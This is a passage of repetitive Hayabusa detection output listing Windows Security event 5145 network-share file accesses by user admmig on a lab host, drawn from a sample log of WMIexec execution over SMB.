10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 